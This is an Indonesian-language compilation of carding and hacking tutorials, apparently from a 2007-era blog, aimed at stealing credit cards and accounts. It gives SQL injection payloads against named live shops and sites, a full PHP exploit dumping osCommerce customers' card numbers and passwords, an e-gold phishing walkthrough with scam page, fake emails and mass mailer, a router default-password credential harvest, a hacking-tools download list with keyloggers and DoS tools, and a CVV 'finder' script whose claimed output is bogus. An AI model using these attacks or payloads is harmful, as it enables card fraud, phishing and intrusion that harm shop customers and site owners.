Script Cek CVV Credit Card Lewat mIRC

Ini adalah script buat ngecek cvv dari kartu kredit.
perlu dicatat 90% hasilnya adalah benar… bukan pasti benar.

caranya, buka irc (ga perlu konek ke server). klik Alt+R
nah akan keluar box. pada tab remote tsb, masukkan script di bawah ini :

alias f5 cvv2
menu status,channel,query {
-
Cari CVV:cvv2
}
alias cekcvv2 {
set %cv1 $left(%cc,8)
set %cv1.1 $right(%cv1,1)
set %cv2 $left(%cc,12)
set %cv2.2 $right(%cv2,1)
set %cv3 $left(%cc,3)
set %cv3.3 $right(%cv3,1)
set %cv4 $left(%cc,1)
set %cv4.4 $calc(%cv3.3 + 1)
set %cvv2 %cv1.1 $+ %cv2.2 $+ %cv4.4
set %cvv $left(%cvv2,3)
.timer 2 2 /echo CVV dari %cc adalah %cvv Sikat!!!
.timer 1 5 /echo —– CVV2 Edited by LeNK #balihackerlink on DALNet —–

}
alias cvv2 dialog -m cvv2 cvv2
dialog cvv2 {
title “CVV Finder by LeNK”
size -1 -1 250 145
box “Enjoy..!!”,2, 4 4 242 110
text “Masukan No CC Yang akan di cari CVV-nya”,4, 1 30 249 25, center
edit “”,5, 55 57 140 20 ,autohs
button “&Cari..!!!”,3, 80 85 100 20,defult,ok
text “Email : l3nk@walla.com “,7, 1 120 249 25, center,disable
}
on 1:dialog:cvv2:*:*: {
if ($devent == sclick) {
if ($did == 3) {
.set %cc $did(5)
.timer 1 1 cekcvv2
}
}
}

jika sudah, klik OK.
nah cara makenya, klik kanan di layar irc dan akan ada pilihan cari cvv pada bagian bawah. masukkan no kartu kreditnya, dan dapatilah hasilnya…

CD Hacking Tools 2007 - Gratis

XxxPass-Team 2007
Danger Cracking & Hacking Tools - Ver 1.0

- Exploit Collection (4 Tools)
- Google Hacking (4 Tools)
- Keyloggers (5 Tools)
- Binder & Packer (15 Tools)
- Flood_DOS (20 Tools)
- Messenger (11 Tools)
- Bruter (9 Tools)
- Anonimity (1 Tool)
- !!! $$$ !!! (13 Tools)
- AIO

Exploit Collection

1. 10377 Exploit
2. SMF ShoutBox Xss & HTML Injection
3. SMF Ultimate Shoutbox Cookie Disclosure Exploit
4. Firefox_BuG

Messenger

1. MSN Extreme 3.0
2. MSN Spy Lite v1.0
3. Yahoo Hack!
4. Hotmail Email Hacker
5. Hotmail Hacker Gold
6. HotmailHack
7. YahooUltraCracker
8. winks,moods,mugins,weemees and meegos + Installer
9. MSN Messenger Account Cracker v2.0
10. SH Yahoo Pass Sender 1.1
11. Yahoo Password Decoder

Google Hacking

1. Alt GooGle
2. Google Version 1.2
3. Google H4ck3r (3 programs)
4. GooLink

Keyloggers

1. Elgolf 1.0 Beta
2. ESK KeyLogger
3. Glog Keylogger
4. HermanAgent
5. IKlogger0.1

Bbruter

1. WebCrack v4.0
2. Brutus
3. Crack FTP
4. FTP Brute Hacker
5. phpbb bruteforcer
6. PhpBB Pass Extractor
7. phpBB Cracker
8. Email Cracker
9. FTP Brute Forcer

!!! $$$ !!!

1. Cmaster
2. CC Verify
3. CWizard
4. THCC
5. Visa Card Generator 06
6. Carcabot_Mass_Email
7. CcHack
8. CC-Fake
9. cvv2c
10. DesertCVV2
11. id-fake
12. Paypal-Link-Spoofed
13. HoW to get Credit Cards Fresh and Fastest

AIO

1. Uploader for All
2. Cool Small Usefull Dp

Flood DOS

1. Flowbabeflow
2. FreeSiteKiller V 2.01
3. Webxgrab
4. Web Attacker ENG
5. TheRapist-Dos Attacker
6. HybridFlood2
7. Ati-russ 3.0
8. Http Bomber v1.001b
9. Sprut
10. DoS_5
11. etherflood
12. DoSAttacker
13. phpBB Dos
14. phpBB Attacker
15. Ping Attack
16. Site Nuke
17. Divine Intervention
18. UC Forum Spammer
19. Inferno Nuker
20. Multiple Site Flood

Silahkan di download di :

http://rapidshare.com/files/24341192/XxxPass-C_H_Ver1.0-_2007-part1.rar.html
http://rapidshare.com/files/24350769/XxxPass-C_H_Ver1.0-_2007-part2.rar.html
Pass : XxxPass_DJ_haselking

Hack ... hack ... hack the World !! :D
( Just for lamerz ) Ref:

Hacking Modem Speedy dan Penanganannya

Hacking Modem Speedy dan Penanganannya

Sebenarnya sudah lama sekali telkom mengadakan diskon besar-besaran untuk meraih pelanggan sebanyak-banyaknya. Udah dulu promosinya. :D

Sama dengan bug-bug yang lainnya, konfigurasi default akan membuat pihak luar yang tidak diinginkan seperti cracker dengan mudah mengeksploitasi secara besar-besaran sehingga memanen username dan password menjadi sesuatu yang memungkinkan sekali untuk dilakukan. Contoh bug yang buruk, yaitu username default dan password yang default.

Sebelum ngejabarin masalah teknisnya, berikut alat-alat yang diperlukan :

Browser Internet ( mau yang banyak bugnya, maupun yang sedikit bugnya )

Website dengan log system flat file ( diambil dari artikelnya Anggi J. )

Aplikasi Instant Messaging, ex : Yahoo Messenger ( Social Engineering )

Internet Password Asterisk Reveal

( http://www.nsauditor.com/freeware/downloads/IEAstRecover.exe )

Langkah Pertama

Silahkan anda baca artikel http://www.ilmuwebsite.com/detil_php_tutorial/2/_Membuat_System_LOG_dengan_FLAT_FILE/
, cara memasang log system flat file. Digunakan untuk mendapatkan alamat ip dari sang korban.

Langkah Ke Dua

Inti dari artikel ini adalah pencarian user yang akan dijadikan korban. Anda bisa menggunakan aplikasi IRC ataupun instant messaging yang lainnya. Alangkah baiknya anda menggunakan aplikasi IRC, seperti mIRC ataupun yang lainnya, karena fasilitas whois yang ada didalamnya mempermudah kita untuk segera mengetahui IP sang korban, tapi pada beberapa kasus, adakalanya user yang advanced menggunakan anonymous proxy yang tentunya menyembunyikan IP asli miliknya. Sehingga perlu teknik social engineering yang lebih ampuh lagi. Berikut ada sedikit percakapan antara seseorang sebagai intruder dengan sang korban menggunakan aplikasi yahoo messenger :

Mamang (intruder) : dah liat situs ini belom, ilmuwebsite.com ???

Sang_korban : apaan tuh ?

Mamang (intruder ) : situs keren punya orang keren, ngebahas tentang berbagai artikel mengenai kekerenan. Coba deh liat.

Sang_korban : coba, gw liat dulu. # kena!!

Mamang ) intruder ) : gimana keren kan ? eh, gw off dulu yah. C U

Situs ilmuwebsite.com tersebut, merupakan sebuah contoh situs yang anda gunakan untuk merecord ip sang korban. Anda bisa memasang log system flat file pada situs milik anda. Dengan mengusahakan sang korban tertarik untuk mengunjungi situs yang telah dipasang log system flat file.

Contoh IP yang sudah dilog dalam flat file,

Waktu: Fri, 06 Jul 2007 12:47:04 +0700 | IP asli: 125.161.2.85 | Browser: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90) | URL: / | Referrer: | Proxy: | Koneksi:

Langkah Ketiga

Setelah mendapatkan alamat ip sang korban, yang perlu anda lakukan adalah membuka browser, kemudian pada address bar isi dengan alamat ip yang telah anda dapatkan, sebagai contoh yang saya dapatkan adalah http://125.160.#.# isikan username dengan admin dan passwordnya admin. Jika anda beruntung, anda akan langsung dihadapkan kepada halaman username ADSL dan tentunya password yang asterisk. Untuk membuka password yang asterisk, anda cukup menggunakan Internet Password Asterisk Reveal.

Penanganan

Sebenarnya dengan mengganti password yang default pun itu sudah bisa mencegah teknik seperti ini. Dan intinya password yang kuatlah yang susah untuk dimanfaatkan. Password yang kuat ini memiliki lebih dari 8 digit, dan merupakan gabungan dari angka huruf dan special character. Ex: ilmVw3851te --> bentuk lain dari ilmuwebsite

Sayangnya, telkom telah menerapkan system yang unique, sehingga account speedy tidak bisa digunakan pada jaringan telepon yang berbeda. Dan tentunya anda tidak bisa men-take over account yang sudah didapatkan. Mohon Maaf, artikel ini hanya sebagai contoh pembelajaran.

Default password untuk setiap modem :

http://www.elitehackers.info/defaultpasslist.php

SQL Injection

SQL Injection
By k0il

SQL Injection AJ Auction seluruh versi SQL Injection pada Aj Auction untuk seluruh versi. =============================================================

Lagi-lagi bug baru di temukan, kali ini Al-k akan coba masuk sebagai admin pada situs yang memiliki bug pada halaman subcat.php

langsung aja buka google-nya ... masukkan keyword ini inurl:/subcat.php?cate_id= nah loh, dapet banyak bangett ... pilih aja salah satunya

contoh : http://www.estoop.it/subcat.php?cate_id=146&view=list&PHPSESSID=27c9b2b6500f2c01c09eda1978d45096 setelah cate_id=

di hapus aja kemudian di ganti dengan

-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,117,114,107,101,121,112,97,115,115,58),pas sword),2%20from%20admin/*&view=list

kira kira jadi begini

http://www.estoop.it/subcat.php?cate_id=-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,11 7,114,107,101,121,112,97,115,115,58),password),2%20from%20admin/*&view=list

nah loh passwordnya langsung dapet

turkey:adminturkeypass:daniel87 itu artinya usernamenya admin passwordnya daniel87 sekarang masuk ke control panelnya

http://www.estoop.it/admin terus masukkin username dan passwordnya jreng jreng jreng anda di bawa ke control panel

Tutorial phising e-gold account

Tutorial phising e-gold account
By th3sn0wbr4in


Bila anda bingung dengan judul di atas, mungkin anda lebih familiar dengan kata-kata berikut : "Tutorial mencuri e-gold", "Tutorial hack e-gold". Tapi, saya sendiri kurang suka dengan kata-kata hack e-gold, karena terdengar kurang pantas saja bila menggunakan kata hack. Di tutorial ini, kita akan membuat situs e-gold yang palsu, dan kemudian mengundang para korban untuk login ke situs e-gold palsu milik kita sehingga semua data yang di-input oleh sang korban akan dikirim ke e-mail kita. Tutorial ini diutamakan untuk pemula, yang medium dan advanced -pun boleh membacanya walau hanya untuk sekedar menghabiskan waktu atau sekedar memaki tutorial ini (*atau penulisnya). Tutorial ini hanyalah sebagai pengetahuan semata, segala kerugian yang diakibatkan oleh artikel ini, bukan tanggung jawab penulis.
Hal-hal yang harus dipersiapkan kurang lebih sebagai berikut :

- Web Hosting / Host / PHP Shell / cPanel atau istilah lainnya yang mendukung PHP.
Banyak orang di luar sana yang menggunakan istilah demikian, cpanel, host, php shell atau apalah. Intinya yang kita butuhkan adalah sebuah web hosting dengan dukungan php. Beruntunglah bagi anda yang sering bermain-main dengan php shell, atau mungkin mengutak-atik web sendiri. Karena anda tidak perlu bersusah payah untuk menempatkan situs e-gold anda nantinya atau bila masih kesulitan, setidaknya tahu bagaimana cara mendapatkannya. Namun, jika anda yang masih kesulitan dan belum mengerti bagaimana untuk mendapatkan web hosting sebagai tempat situs e-gold palsu, sepertinya anda harus sedikit bekerja keras untuk mendapatkannya, bisa meminta, berusaha mencari sendiri, atau bagaimanalah. Tapi yang jelas, saya tidak akan memberitahu caranya secara detail di sini, karena sudah banyak situs-situs berbahasa indonesia yang menyediakan cara untuk mendapatkan php shell, cpanel dsb. Atau, anda bisa juga menggunakan CC (Credit Card) untuk memesan web host secara online. Atau cara lain ? Silahkan berfantasi dengan kreativitas anda. Dan jangan lupa, yang terpenting adalah mendukung PHP dan bisa digunakan untuk mengirim e-mail.
Nah, untuk menjebak korban masuk ke dalam lubang jebakan sudah dimulai. Lubang jebakannya sudah disiapkan, lalu ?

- E-gold scampage
Agar korban mau masuk ke dalam lubang jebakan yang kita buat, kita harus membuat lubang jebakan tersebut tidak terlihat seperti lubang jebakan, namun terlihat biasa saja. Kira-kira seperti itulah fungsi scampage ini, dan menurut pendapat pribadi scampage adalah duplikat dari situs asli dan mengedit beberapa bagian sesuai kebutuhan/penipuan atau simple-nya duplikasi situs untuk menipu. Scampage ini merupakan scampage bikinan saya sendiri (*makanya jelek), yang merupakan komposisi dari, situs asli www.e-gold.com, dan menggunakan beberapa campuran script dari scampage yang dibuat oleh phiser lain, namun tidak di-update sehingga tampilannya tidak lagi terlihat seperti situs asli.
Download e-gold scampage di :
http://geocities.com/th3sn0wbr4in/egoldscampage.zip
Setelah anda men-download egoldscampage.zip ke komputer anda, extract file egoldscampage.zip dan edit file login.php dan login1.php yang terletak di folder www.egold.comacct.
Pada bagian $to = "your@e-mail.com"; ganti your@e-mail.com dengan e-mail anda yang nanti akan digunakan untuk menampung accountID + password e-gold dari korban-korban anda. Begitu juga pada file login1.php, ganti your@e-mail.com dengan e-mail anda yang nanti akan digunakan untuk menampung e-mail + password si korban.
Simpan semua perubahan yang sudah anda lakukan, dan sekarang upload file egoldscampage.zip ke Web Hosting yang sudah anda siapkan sebelumnya dan extract file egoldscampage.zip di Web hosting anda.

- E-mail palsu
Anda memasuki zona terlarang!!! Lewat sini agar anda selamat - TTD, Warga Sekitar. Kira-kira seperti itulah papan yang terpampang ketika anda sedang melewati daerah asing. Orang yang belum mengenal betul daerah tersebut, pasti akan mengikuti petunjuk jalan yang diberikan, apalagi ada tanda bahwa informasi ini berasal dari orang sekitar. Bagi yang panik, tentu mereka tidak lagi berpikir panjang dan langsung mengikuti petunjuk yang ada, sehingga mereka terjebak ke dalam lubang yang kita buat.
Kurang lebih, begitulah fungsi si 'e-mail palsu'. Berikut ini adalah dua buah e-mail palsu yang mungkin bisa anda gunakan.
http://geocities.com/th3sn0wbr4in/gold-letter-1.txt
http://geocities.com/th3sn0wbr4in/gold-letter-2.txt

Untuk gold-letter-1.txt, ada bagian yang harus anda ubah sebelum e-mail tersebut dikirimkan ke korban.



Please update your records on or before October 5th, 2007.


Ganti October 5th, 2007 dengan tanggal 3-5 hari kemudian ketika anda mengirimkan e-mail palsu. Misalnya, anda mengirim e-mail tersebut pada tanggal 1 October 2007, anda ganti menjadi 3-5 hari ke depan sebagai tenggang waktu untuk sang korban.
Pada gold-letter tersebut, ada 4 bagian yaitu : From, Name, Subject, dan Message. Keempat-nya ini akan digunakan pada Inbox Mailer nanti. Jika anda ingin melihat preview e-mail tersebut, copy-paste Message dari letter tersebut ke notepad, dan save sebagai file html. Di setiap e-mail tersebut, terdapat sebuah link yang akan mengarahkan korban ke situs e-gold milik anda.
Contoh pada gold-letter-1.txt, jika anda melihat preview dari e-mail tersebut, isinya adalah demikian :

To update your E-gold records click on the following link:

https://www.e-gold.com/acct/login.html

Namun, bila anda melihat html code-nya, isinya adalah demikian :



To update your E-gold records click on the following link:



https://www.e-gold.com/acct/login.html

Jadi, link https://www.e-gold.com/acct/login.html sebenarnya mengarah ke http://www.modelbc.de/administrator/modules/www.e-gold.com/acct/login.html yang merupakan 'lubang jebakan' milik th3sn0wbr4in. Ganti http://www.modelbc.de/administrator/modules/www.e-gold.com/acct/login.html dengan alamat situs e-gold milik anda sendiri yang sudah anda persiapkan.

Berikut ini, contoh e-mail gold-letter-1 di inbox yahoo milik saya
http://i189.photobucket.com/albums/z55/ianis01/contentmailno4.png

- PHP Inbox Mass Mailer
Sayangnya, kedua gold-letter tersebut barulah desain. Selama e-mail tersebut masih berada di komputer lokal, tidak ada korban yang bisa melihatnya sehingga tidak satupun terjebak masuk ke dalam jebakan yang sudah anda siapkan. Agar 'para korban' melihat e-mail tersebut, anda harus mengirimkan e-mail ke korban.
Dan bila anda ingin korban anda 'melihat' e-mail tersebut, e-mail anda harus tiba di Inbox sang korban, bukan Bulk, Spam, Junk atau istilah lainnya, karena jarang korban yang mau melihat e-mail yang tiba di kategori-kategori tersebut (Bulk, Spam, Junk, etc) walaupun memang ada, tapi tidak banyak.
Karena itu, anda harus menggunakan PHP Inbox Mass Mailer, merupakan sebuah script PHP yang digunakan untuk mengirimkan e-mail secara massal ke korban.
Contoh tampilannya adalah sebagai berikut :
http://i189.photobucket.com/albums/z55/ianis01/mailergl3.png
Isi field Your Email, Your Name, Subject, dan Message seperti yang tertera pada gold-letter-1 atau gold-letter-2, tapi isi dengan gold-letter yang sudah anda edit.
Script php inbox mass mailer :
http://geocities.com/th3sn0wbr4in/mailer.txt
http://geocities.com/th3sn0wbr4in/mailer.arif.txt
Untuk script mailer.arif.txt, didapat dari teman yang original link-nya adalah
http://geocities.com/aliif_1604/run.txt

Agar anda bisa menggunakan PHP Inbox Mass Mailer, anda harus meng-upload-nya ke Web Hosting yang mendukung PHP dan mengirim mail. Sekarang bagaimana caranya agar e-mail tersebut masuk inbox, itu tergantung pada Web Hosting tempat anda meng-upload script mailer-nya. Tidak semua host yang bisa mengirim mail tapi tiba di inbox. Apalagi, kita menggunakan AccountRobot_donotreply@e-gold.com sebagai e-mail pengirim. Bagaimana caranya mengetahui apakah host bisa mengirim e-mail dan tiba di inbox ? Cukup upload script mailer, dan coba anda kirim ke e-mail anda sendiri. Apabila anda mendapatkan e-mail palsu anda tiba di inbox, berarti host tersebut layak digunakan untuk mengirim e-mail e-mail palsu ke korban. Pengalaman pribadi saya sendiri, bagian inilah yang paling sulit. Sejak beberapa tahun yang lalu saya sudah menyiapkan semua yang saya butuhkan untuk membuat jebakan ini, tapi selalu terhenti karena belum juga mendapatkan host yang layak untuk mengirimkan e-mail palsu ke korban. Awalnya saya pikir tidak mungkin mendapatkan host yang bisa mengubah alamat pengirim menjadi seperti AccountRobot_donotreply@e-gold.com. Tapi pada akhir tahun 2006, seorang teman yang memiliki Yahoo! ID tommyhacku memberikan saya sebuah host yang bisa melakukannya.
Jadi, selamat berjuang untuk mendapatkannya. Bila anda sudah mendapatkannya, saat-nya mengumpulkan daftar korban.

- E-mail list
Tentukan siapa korbanmu!!! Bagaimana mengetahui e-mail orang yang memiliki e-gold account?
- Cari dari forum-forum yang berbicara soal e-gold, paypal, atau business
- Cari dari situs-situs HYIP
Tapi sepertinya yang demikian itu cukup sulit. Jadi, kita tidak perlu e-mail yang mana yang mempunyai e-gold account. Masukkan saja semua daftar e-mail ke dalam field target di PHP Mailer. Beberapa cara yang bisa didapatkan untuk mendapatkan e-mail list :
- Beli lewat situs-situs yang menjualnya menggunakan CC. Anda bisa menggunakan keyword "buy e-mail leads" atau keyword lainnya lewat google. Silahkan dicoba-coba keyword lainnya.
- Menggunakan software e-mail extractor
Salah satu software yang terkenal untuk mengumpulkan e-mail adalah Tarantula.
Download software-nya di http://www.emailsmartz.com/downloads/tarantula.exe
Download Patch Tarantula di http://www.geocities.com/toemenggoeng/error/Patch-Tarantula-SG.zip
Jangan tanya saya untuk menggunakannya. Silahkan coba-coba sendiri

- Action!!!
Setelah semua siap, silahkan kirim e-mail palsu ke daftar korban lewat php mailer anda dan tunggu hasilnya di e-mail anda.

Secara simple, yang dibutuhkan adalah :
- Host, yang belum punya boleh nyoba http://modelbc.de/administrator/modules/index_page.php (c99 shell)
- Scampage, source : http://geocities.com/th3sn0wbr4in/egoldscampage.zip
- Mailer + Host utk Mailer, source : http://geocities.com/th3sn0wbr4in/mailer.txt
- Mail list

Tanya-Jawab :
Q:Saya upload scampage-nya ke PHP Shell tapi ber-platform windows, tapi koq error mulu?
A:Cari saja paltform UNIX

Q:Saya sudah menggunakan PHP Mailer yang bagus, tapi kenapa masih tidak masuk ke inbox saya?
A:Pada beberapa kasus, e-mail palsu tersebut tidak masuk ke inbox karena memang sudah di-block oleh penyedia layanan e-mail (Google, Yahoo!, etc), sehingga anda harus mengganti gold-letter. Edit saja beberapa bagian dari gold-letter dan coba lagi. Tapi semoga gold-letter yang saya berikan belum di-block oleh penyedia layanan e-mail, jika iya, anda harus mencoba cari yang lain.

Q:PHPMailer saya sudah masuk ke inbox, tapi beberapa setelah saya gunakan phpmailernya tdk bisa mengirim lagi, knp ya?
A:Jika sudah digunakan untuk mengirim e-mail palsu apalagi dengan daftar korban yang cukup banyak, mungkin host-nya sudah masuk ke dalam blacklist, jadi silahkan cari yang lain.

Q:Sudah dapat hasilnya, tapi informasi e-mail nya tidak ada, hanya login e-gold dan berhenti ketika e-gold meminta AccSent Pin, gimana?
A:Di e-mail yang berisi E-gold Account Login ada informasi IP Address dan Browser. Saya juga sering mendapatkan yang demikian, kemudian saya meminta tolong teman yang mempunyai proxy list yang cukup banyak sehingga proxy-nya bisa digunakan untuk mem-by-pass accsent pin request. YahooID-nya adalah : acer_pira
Semoga dia masih bisa membantu, tapi bila tidak, silahkan cari yang lain.

Cari nomor Kartu Kredit dengan Bug Digishop

1–] Buka Google

2–] Ketik inurl:“/cart.php?m=” [atau kreasi lo sendiri]

3–] Pilih salah satu target misalnya :
http://uniquescrapbooks.com.au/store/cart.php?m=view.
hapus tulisan cart.php?m= dengan admin.
Jadinya http://uniquescrapbooks.com.au/store/admin
4–] Nanti akan muncul menu login.
Masukkan bug SQL Injection ini untuk Username dan Password
Pada Username dan Password, isi dengan ‘or”=”

_________________
Username :|_____’or”=”______|
_________________
Password :|_____’or”=”______|

5–] Klo berhasil, nanti akan muncul Main Menu dan silahkan cari CC nya. (udah sampe sini silahkan explorasi, jangan minta disuapin terus)
Liat yang pending orders karena CC nya masih ada, kalau di pending orders CC nya udah ga ada berarti lo udah keduluan orang, he…he…he…

6–] Klo yang muncul Invalid Username or Password, berarti SQL
Injection-nya udah ga mempan, he…he…he…silahkan cari
yang lain.

—==[ Tips : - Klo` Lo dapet yang Order-an nya masih sedikit, targetnya di simpen aja dulu, mungkin beberapa hari kemudian udah ada CC baru (alias ada yg shopping)
- Klo` dapet target bagus, jangan lupa bagi-bagi
ya, he…he…he…

GOOD LUCK !

—==[ Contoh Target ]==—

http://www.7footserb.com/shop/admin/

https://www.tangerineclothing.com/admin/

https://www.flagsbygm.com/store/admin/

https://www.facesbyfelicia.com/store/admin/

http://creativecaketoppers.com/admin/

Cari CC dari osCommerce

Artikel ini hanya untuk pembelajaran saja untuk para webmaster. tidak ada yang berbahaya dalam artikel ini. Yang menjadikannya berbahaya adalah orang yang menggunakannya untuk kepentingan tidak baik saya tidak bertanggung jawab atas segala pengrusakan yang terjadi setelah anda membaca artikel ini

---

Cari CC dari osCommerceDapatkan CC Info dari bug osCommerce

————– Exploit Code ————-

#!/usr/bin/php -q -d short_open_tag=on

error_reporting(0);
ini_set(”max_execution_time”,0);
ini_set(”default_socket_timeout”,5);

if ($argc<5) {
echo ” Exploit osCommerce < 2.2 Milestone 2 060817 “;
echo ” Usage: php “.$argv[0].” host path product_id whatinfo OPTIONS “;
echo ” host - target server (ip/hostname) “;
echo ” path - path to osCommerce “;
echo ” product_id - Valid product_id “;
echo ” whatinfo - pass for password, cc for credit card info, addr for address “;
echo “Options: “;
echo ” -D: Show debug or verbose on “;
echo ” -p[port]: specify a port other than 80 “;
echo ” -P[ip:port]: specify a proxy “;
echo “Example: “;
echo ” php “.$argv[0].” localhost /os2/catalog/ 2 pass “;
echo ” php “.$argv[0].” 192.168.1.108 /os2/catalog/ 2 pass -p8080 -P192.168.1.108:3128 -D “;
echo ” php “.$argv[0].” 192.168.1.108 /os2/catalog/ 2 cc -p8080 -P192.168.1.108:3128 “;
die;
}

$host=$argv[1];
$path=$argv[2];
$products_id=$argv[3];
$whatinfo=$argv[4];
$port=80;
$Debug=0;
$proxy=”";
for ($i=5; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp==”-p”)
{
$port=str_replace(”-p”,”",$argv[$i]);
}
if ($temp==”-P”)
{
$proxy=str_replace(”-P”,”",$argv[$i]);
}
if ($temp==”-D”)
{
$tmp=str_replace(”-D”,”",$argv[$i]);
$Debug=1;
}
}

if (($path[0]<>´/´) or ($path[strlen($path)-1]<>´/´)) {echo ´Error… check the path!´; die;}

if($Debug==1) {
echo “Name : osCommerce Multiple Vulnerabilities “;
echo “Date : August 17, 2006 “;
echo “Vendor : osCommerce “;
echo “URL : http://www.oscommerce.com/ “;
echo “Version : osCommerce < 2.2 Milestone 2 060817 “;
echo “Risk : Multiple Vulnerabilities “;
echo “Exploit : Customers Info, Pass, and Credit Info Disclosure “;
echo “Author : Perseus “;
echo “Compatibility : magic_quotes_gpc off, union supported “;
echo “Greets : rgod, James Bercegay, str0ke, hdm, r57 “;
}

// try if you can rewrite this code to attack osc with magic_quotes_gpc on
// because I found it impossible for the moment.
// this will make oscommerce people update their vuln servers right now.

$proxy_regex = ´(d{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5})´;
if ($proxy==´´) {$p=$path;} else {$p=´http://´.$host.´:´.$port.$path;}
$loop = 1000;

function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex, $Debug;
if ($proxy==´´) {
if($Debug==1) echo ” Processing packets directly… “;
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo ” No response from “.$host.”:”.$port.” “; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo ´Not a valid proxy…´;die;
}
$parts=explode(´:´,$proxy);
if($Debug==1) echo ” Processing packets using proxy “.$parts[0].”:”.$parts[1].” … “;
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo ” No response from proxy… “;die;
}
}
fputs($ock,$packet);
if ($proxy==´´) {
$html=´´;
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html=´´;
while ((!feof($ock)) or (!eregi(chr(0×0d).chr(0×0a).chr(0×0d).chr(0×0a),$html))) {
$html.=fread($ock,1);
}
}

fclose($ock);
#debug
#echo ” “.$html;
}
$bl=0;
for($y=0;$y<=$loop;$y++) {
//1. get cookie
$out = “GET “.$p.”product_info.php?products_id=”.$products_id.” HTTP/1.1 “;
$out .= “Host: “.$host.” “;
$out .= “Connection: Close “;
sendpacketii($out);
$e = explode(”Set-Cookie: osCsid=”,$html);
$e2 = explode(”;”,$e[1]);
$cookie = $e2[0];

//2. injection
if($whatinfo==”pass”) {

$sql=”999´ UNION SELECT 0 , CONCAT( CHAR(77),´||||´, customers_password, ´^´, customers_email_address,´|´,customers_firstname,´|´,customers_lastname,´|´,customers_dob,´|´,customers_telephone, ´^´) , 0 , 0
FROM customers LIMIT “.$y.”,1 /*”;

} elseif($whatinfo==”addr”) {

$sql=”999´ UNION SELECT 0 , CONCAT( CHAR(77),´||||´, entry_company, ´^´, entry_firstname,´|´,entry_lastname,´|´,entry_street_address,´|´,entry_suburb,´|´,entry_postcode,´|´,entry_city,´|´,entry_state, ´^´) , 0 , 0
FROM address_book LIMIT “.$y.”,1 /*”;

} elseif($whatinfo==”cc”) {

$sql=”999´ UNION SELECT 0 , CONCAT( CHAR(77),´||||´, cc_type, ´^´, cc_owner,´|´,cc_number,´|´,cc_expires,´|´,billing_street_address,´|´,billing_suburb,´|´,billing_city,´|´,billing_postcode,´|´,billing_state,´|´,billing_country,´^´) , 0 , 0
FROM orders LIMIT “.$y.”,1 /*”;

}

$sql=urlencode($sql);
$data = “id[0]=”.$sql.”";
$data.=”&products_id=”.$products_id.”";
$out = “POST “.$p.”product_info.php?products_id=”.$products_id.”&action=add_product&osCsid=”.$cookie.” HTTP/1.0 “;
$out .= “User-Agent: Googlebot/2.1 “;
$out .= “Host: “.$host.” “;
$out .= “Accept: text/plain “;
$out .= “Connection: Close “;
$out .= “Content-Type: application/x-www-form-urlencoded “;
$out .= “Cookie: “.$cookie.” “;
$out .= “Content-Length: “.strlen($data).” “;
$out .= $data;
sendpacketii($out);

//3. get vals
$out = “GET “.$p.”shopping_cart.php?osCsid=”.$cookie.” HTTP/1.1 “;
$out .= “Host: “.$host.” “;
$out .= “Connection: Close “;
sendpacketii($out);
//echo $html;
$e = explode(”M||||”,$html);
$e2 = explode(”^”,$e[1]);
$str = ” “.$y.”. “.$e2[0].” “.$e2[1].” “;
echo $str;
$strl = strlen($str);
if($strl<=25) $bl++;
if($bl==3) break;

}

?>

——- End Code ———–

SQL Injection

/*********************************************************
* SQL Injection, step by step.
*
* No Warranty. This tutorial is for educational use only,
* commercial use is prohibited.
*
**********************************************************/

Akhir-akhir ini, anda sering mendengar istilah "SQL Injection" ?
Anda tahu betapa berbahaya bug yang satu ini ?
Berikut akan kita sajikan step by step SQL Injection ini.
Catatan : kita akan membatasi bahasan pada SQL Injection
di MS-SQL Server.

Kita akan mengambil contoh di site www.pln-wilkaltim.co.id
Ada dua kelemahan di site ini, yaitu:
1. Tabel News
2. Tabel Admin

Langkah pertama, kita tentukan lubang mana yang bisa di-inject
dengan jalan berjalan-jalan (enumeration) dulu di site tsb.
Kita akan menemukan 2 model cara input parameter, yaitu dengan
cara memasukkan lewat input box dan memasukkannya lewat
alamat URL.

Kita ambil yang termudah dulu, dengan cara input box.
Kemudian kita cari kotak login yang untuk admin.
Ketemu di www.pln-wilkaltim.co.id/sipm/admin/admin.asp
Langkah pertama untuk menentukan nama tabel dan fieldnya,
kita inject kotak NIP dengan perintah (password terserah, cabang
biarkan aja):
' having 1=1--
jangan lupa untuk menuliskan tanda kutip tunggal dan tanda
minus dobel (penting).
Arti kedua tanda tsb bisa anda cari di tutorial SQL Injection
di www.neoteker.or.id ini (lihat arsip sebelumnya).
Kemudian akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NOMOR' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Keluarlah nama field pertama kita !!!
Catat nama tabel : T_ADMIN
Catat nama field : NOMOR

Kemudian kita akan mencari nama field-field berikutnya,
beserta nama tabel yang mungkin berbeda-beda.
Kita inject di kotak NIP (password terserah):
' group by T_ADMIN.NOMOR having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.NIP' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya itulah nama tabel dan field kedua kita.
Catat : T_ADMIN.NIP

Kemudian kita cari field ke tiga :
' group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1--
Akan keluar pesan error:
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'T_ADMIN.PASSWORD' is invalid in the select list because
it is not contained in either an aggregate
function or the GROUP BY clause.
/sipm/admin/dologin.asp, line 7
--------------------
Catat field ke tiga : T_ADMIN.PASSWORD

Lakukan langkah di atas sampai kita menemukan field terakhir.

